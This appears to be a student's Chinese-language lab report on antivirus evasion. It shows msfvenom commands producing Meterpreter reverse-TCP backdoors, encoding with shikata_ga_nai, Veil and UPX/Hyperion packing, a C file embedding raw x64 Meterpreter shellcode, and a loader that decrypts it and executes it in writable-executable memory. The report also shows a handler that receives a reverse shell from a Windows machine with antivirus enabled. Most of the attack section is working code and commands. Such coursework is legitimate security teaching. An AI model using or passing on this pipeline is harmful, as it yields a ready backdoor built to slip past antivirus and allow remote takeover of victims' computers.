20222410 2024-2025-1 《网络与系统攻防技术》实验三实验报告

1.实验内容

1.1 本周内容回顾

本周我们更加深入地学习了缓冲区溢出的相关知识,学习了在Linux系统和Windows系统中缓冲区溢出的一些实例和防范方法。此外,我们还学习了关于ncat,socat等工具的原理以及一些关于后门的基础知识。

1.2 问题回答

  • 杀软是如何检测出恶意代码的?
  1. 基于特征码的检测;2.启发式恶意软件检测;3.基于行为的恶意软件检测
  • 免杀是做什么?
    一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术。
  • 免杀的基本方法有哪些?
  1. 改变特征码
    (1)只有EXE:加壳:压缩壳 加密壳 (2)有shellcode(像Meterpreter):用encode进行编码
    或基于payload重新编译生成可执行文件(3)有源代码:用其他语言进行重写再编译(veil-evasion)
  2. 改变行为
    (1)通讯方式:尽量使用反弹式连接、使用隧道技术、加密通讯数据
    (2)操作模式:基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

1.3 实验要求

  • 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
    • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
    • veil,加壳工具
    • 使用C + shellcode编程
  • 通过组合应用各种技术实现恶意代码免杀
    如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验过程

2.1 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

2.1.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

查看 msfvenom 支持的所有输出格式:输入msfvenom --list formats

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh.exe,生成payload

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型,是一个 Meterpreter 反向 TCP 连接
LHOST=192.168.136.132 设置了连接回的本地 IP 地址,即kali虚拟机的 IP 地址
LPORT=2410 设置了连接回的本地端口号,这里为学号后四位
-f exe: 这指定了输出格式为 Windows 可执行文件


查看 msfvenom 支持的所有编码方式:输入msfvenom --list encoders

使用编码器对payload进行编码,输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-2.exe

-e x86/shikata_ga_nai: 这指定了要使用的编码器;
-b ‘\x00’: 这指定了需要避免的坏字符集;
LHOST、LPORT同上;


多次编码:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.132 LPORT=2410 -f exe > 20222410yh-3.exe
-i 10表示编码10次

选择一个适用于Java环境的payload来生成jar文件:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f jar > 20222410yh-4.jar

使用编码器对payload进行编码:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f jar > 20222410yh-5.jar

生成一个反向 TCP 连接的 Linux elf 可执行文件:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -f elf > 20222410yh-6.elf

使用编码器对payload进行编码:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.136.132 LPORT=2410 -e x86/shikata_ga_nai -i 10 -f elf > 20222410yh-7.elf

将生成的20222410yh.exe等多个文件放到共享文件夹中传到主机上
将这些文件传到Virustatol检测:
20222410yh.exe:

20222410yh-2.exe:

20222410yh-3.exe:

20222410yh-5.jar:

20222410yh-7.elf:

2.1.2 使用veil工具加壳工具

安装veil,需要保持虚拟机是联网状态,依次输入以下命令:

mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
sudo apt-get install wine32



当输入完sudo apt-get install wine32后报错,此时先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后输入sudo apt-get install wine32即可

再依次输入:
apt-get install veil  ——安装veil
sudo su
cd /usr/share/veil/config/
vim setup.sh


在第200多行的代码中,找到下图内容,按i键进入编辑模式,把下载地址换成https://gitee.com/spears/VeilDependencies.git,按ESC键,输入:wq退出

运行veil进行安装,过程中需要安装多个程序,一路默认安装。


发现报错,输入sudo /usr/share/veil/config/setup.sh --force --silent,继续安装

完成安装,输入veil

输入use evasion ,进入Evil—Evasion

输入list,查看可使用的payload类型

使用c/meterpretermrev_tcp.py,即7号,所以输入use 7

这里我的虚拟机ip和前面不一样,时因为我在安装veil时提示硬盘空间不够,我重装了kali,所以

ip地址和前面实验的地址不同了

依次输入:

set LHOST 192.168.136.129	 //Kali的ip
set LPORT 2410	 //设置端口2410
generate
输入生成的文件名称:20222410_veil;

输入cd /var/lib/veil/output/compiled/,进入文件夹,输入ls查看生成的.exe可执行文件

同样,将20222410_veil.exe文件移入共享文件夹,使用VirusTotal进行检测

2.1.3 使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.129 LPORT=2410 -f c,其中LHOST为反弹回连的IP,即Kali的IP

新建20222410.c文件,并进行编辑

按i键进入编辑模式,将使用msfvenom生成的buf[]数组复制粘贴到打开的文件中,并输入C语言代码,代码如下

按ESC键,输入:wq退出编辑
再输入i686-w64-mingw32-g++ 20222410.c -o 20222410.exe

同样,将20222410.exe文件移入共享文件夹,使用VirusTotal进行检测

2.1.4 加壳工具

upx加壳:输入upx 20222410.exe -o upx20222410.exe

hyperion加壳:
输入cp upx20222410.exe /usr/share/windows-resources/hyperion;
输入cd /usr/share/windows-resources/hyperion进入文件夹;
输入ls查看生成的可执行文件

输入wine hyperion.exe -v upx20222410.exe upx20222410_1.exe

同样,将upx20222410.exeupx20222410_1.exe文件移入共享文件夹,使用VirusTotal进行检测
upx20222410.exe:

upx20222410_1.exe:

2.2 通过组合应用各种技术实现恶意代码免杀

组合技术:msfvenom生成Shellcode数组,再使用凯撒加密对数组进行加密,将加密后的密文放入txt文件中,再编写C语言代码,从txt文件中读取密文,解密并运行Shellcode,最后生成.exe可执行文件。

kali虚拟机中通过msfvenom生成Shellcode数组,代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.136.129 LPORT=2410 -f c

使用任意一个C编辑器,新建20222410_jiami.c(cpp)文件,输入代码,代码功能为将复制内容放入shellcode1[]数组中,通过代码将shellcode1进行凯撒加密,将密文输入到2410jiami.txt文件中;

在同文件夹下新建空文件2410jiami.txt,用以存放密文

代码如下:

#include <stdio.h>

#include<string.h>

//凯撒加密函数,适用于unsigned char数组

void caesarEncrypt(unsigned char *data, size_t length, int shift) {

for (size_t i = 0; i < length; i++) {

// 对每个字节进行位移

data[i]= (data[i] + shift) & 0xFF;

}

}

int main( ) {

unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"

"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"

"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"

"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"

"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x41\x51\x0f"

"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"

"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50\x8b\x48\x18\x49"

"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"

"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"

"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"

"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"

"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"

"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"

"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"

"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"

"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"

"\x89\xe5\x49\xbc\x02\x00\x27\x66\xc0\xa8\x4c\x80\x41\x54"

"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"

"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"

"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"

"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"

"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"

"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"

"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"

"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"

"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"

"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"

"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"

"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"

"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"

"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"

"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"

"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"

"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"

"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"

"\xf0\xb5\xa2\x56\xff\xd5";

int shift =3; // 加密位移

printf("original: ");

for (size_t i = 0; i < 510; i++) {

printf("\\x%02x",shellcode1[i]);

}

printf("\n");

caesarEncrypt(shellcode1,510,shift);

printf("Encrypted:");

for (size_t i =0;i< 510; i++){

printf("\\x%02x",shellcode1[i]);

    }

printf("\n");

    FILE *file = fopen("2301jiami.txt", "w");

    if (file != NULL) {

        for (size_t i = 0; i < 510; i++) {

            fprintf(file, "\\x%02x", shellcode1[i]);

        }

        fprintf(file, "\n");

        fclose(file);

    } else {

        printf("Error opening file!\n");

    }

return 0;

}

编辑并运行该文件

新建20222410_jiemi.cpp文件,输入代码,代码功能为读取2410jiami.txt文件中的内容到

shellcode1[]数组中,并进行解密,再运行shellcode

代码如下:

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

// 凯撒解密函数,适用于unsigned char数组

void caesarDecrypt(unsigned char *data, size_t length, int shift) {

    for (size_t i = 0; i < length; i++) {

        // 对每个字节进行位移

        data[i] = (unsigned char)((data[i] - shift + 256) % 256);

    }

}

 

int main() {

    int shift = 3; // 凯撒加密的位移值

    unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节

    char line[1024]; // 用于读取文件的临时缓冲区

 

    // 打开文件

    FILE *file = fopen("2410jiami.txt", "r");

    if (file == NULL) {

        perror("Error opening file");

        return 1;

    }

 

    // 读取文件内容到shellcode1数组中

    size_t length = 0;

    while (fgets(line, sizeof(line), file)) {

        // 将读取的十六进制字符串转换为字节并存储在shellcode1中

        for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {

            if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {

                length++;

            }

        }

    }

    fclose(file);

 

    // 解密shellcode

    caesarDecrypt(shellcode1, length, shift);

 

    // 输出解密后的shellcode

    /*printf("Decrypted Shellcode:\n");

    for (size_t i = 0; i < 510; i++) {

        printf("\\x%02x", shellcode1[i]);

    }

    printf("\n");*/

 

    // 分配内存并设置为可执行

    LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

 

    // 将解密后的shellcode复制到分配的内存中

    memcpy(exec, shellcode1, sizeof shellcode1);

    // 执行shellcode

    ((void(*)())exec)();

 

    return 0;

}

编译该文件,打开文件所在位置,可以看到如下文件:

20222410_jiemi.exe即为所需文件;
与杀软共存:

2.3 用电脑实测,在杀软开启的情况下,可运行并回连成功

在kali中使用msfconsole指令进入msf控制台,对msf控制台进行配置;

依次输入以下命令:

use exploit/multi/handler  使用监听模块,设置payload

set payload windows/x64/meterpreter/reverse_tcp  使用和生成后门程序时相同的payload

set LHOST 192.168.136.129  和生成后门程序时指定的IP相同

set LPORT 2410

输入run;

win10虚拟机里双击运行20221313_jiemi.exe,返回到kali,发现获得了Windows主机的连接,得到了远程控制的shell,可执行相关命令,如dir

说明回连并攻击成功
我使用的电脑的杀软是讯电脑管家
版本:17.1.25794.211

3.问题及解决方案

  • 问题1:安装veil时输入sudo apt-get install wine32后报错
  • 问题1解决方案:分析可能是缺少i386架构支持。我的的系统默认只支持64位架构,需要手动添加对32位架构(i386)的支持,才能安装32位的软件包。
  • 问题2:安装veil时输入apt-get install veil命令时报错,提示硬盘剩余空间不够
  • 问题2解决方案:原有的硬盘我只设置了8G,不够用,重装了kali,将硬盘设置成80G后成功安装。
  • 问题3:安装veil时输入set LHOST 192.168.136.129命令,最后安装失败
  • 问题3解决方案:在问题2的解决方案中我提到了重装虚拟机增加硬盘空间,重装kali后,我的虚拟机IP发生了变化,之前是192.168.136.132,现在是192.168.136.129,一开始我还没意识到,直到后面配置一直出错,我才反应过来。
  • 问题4:最开始生成shellcode时使用的是msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.129 LPORT=2410 -f c,发现最后生成的恶意可执行文件打开后几秒便消失了,无法运行到底。
  • 问题4解决方案:更换版本,使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.136.129 LPORT=2410 -f c,最后成功运行。

4.学习感悟、思考等

  • 安装veil真的是很麻烦,各种报错 ,需要我不断查阅资料、请教同学才能解决
  • 做实验要认真、仔细,摸清实验原理,我在重装虚拟机后虚拟机的IP地址发生变化都没意识到,导致后续做实验出现了很多麻烦,这提醒我做实验不能照搬着实验指导书,要有自己的理解
  • 做完实验,我对实验提出的问题有了答案:杀软通过静态查杀、行为查杀和云查杀等方式检测出恶意代码,免杀是一种反病毒技术,旨在使病毒木马免于被杀软查杀,免杀的基本方法包括修改恶意代码的特征码、加密处理、分离免杀、加壳混淆等。
  • 在运行恶意代码时,我的20222410_jiami.exe和20222410_jiemi.exe执行不到几秒就消失了,可以看出电脑杀毒软甲对电脑安全的重要性,但电脑杀毒软甲如金山毒霸等又给人一种“不是病毒,胜似病毒”的感觉,希望能有更高效的杀毒软件。
posted @ 2024-10-18 12:05  Lelouch-vi  阅读(52)  评论(0编辑  收藏  举报